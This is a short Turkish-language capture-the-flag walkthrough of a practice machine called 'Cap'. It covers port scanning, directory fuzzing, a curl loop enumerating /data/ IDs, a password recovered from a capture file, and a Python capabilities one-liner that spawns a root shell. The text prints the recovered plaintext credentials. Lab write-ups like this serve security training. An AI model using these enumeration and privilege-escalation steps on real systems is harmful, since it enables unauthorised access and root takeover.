IP=10.129.82.1

her zamanki gibi full port scan taraması yapıldı


┌─[carrie@parrot]─[~/Desktop/Machines/Cap]

└──╼ $nmap -sV -vv -T4 -n -Pn --max-rtt-timeout 1500ms --min-rate 1000 --max-retries 3 --open $IP -oG full_port_scan -p-

1/tcp open ftpsyn-ack vsftpd 3.0.3

22/tcp open sshsyn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

80/tcp open httpsyn-ack Gunicorn

carrie@parrot]─[~/Desktop/Machines/Cap]

└──╼ $nmap -sC -p21 $IP -vv -Pn -n

script scan yaptım zafiyet var mı yok mu diye

web olduğu için webi incelerken arkada ffuf çalıştırdım

┌─[carrie@parrot]─[~/Desktop/Machines/Cap]

└──╼ $ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://10.129.82.1/FUZZ

/data/ ve search parametresi dikkatimi çektiği için üzerine gittim ama her zamanki gibi /data/'da verirken

┌─[✗]─[carrie@parrot]─[~/Desktop/Machines/Cap]

└──╼ $for i in {1..3000}; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "http://10.129.82.1/data/$i")
    [ "$code" = "200" ] && echo "$i"
done

verdim :D boşa geçen onca zamandan sonra 0'I deneyince zihnim açıldı vesselam

pcap dosyası inceleyince


user : nathan

password : Buck3tH4TF0RM3!


ftp girişini buldum ve içeri giriş sağladım.

bunu ssh üzerinde de denedim yine giriş sağladı sağolsun nathan ablamıza.

linpeası çalıştırıken user olarak capabilities'te python'u çalıtşırabileceğimi gördüm ;

https://gtfobins.org/gtfobins/python/

nathan@cap:/tmp$ python3 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'

şu kod ile root.txt alındı.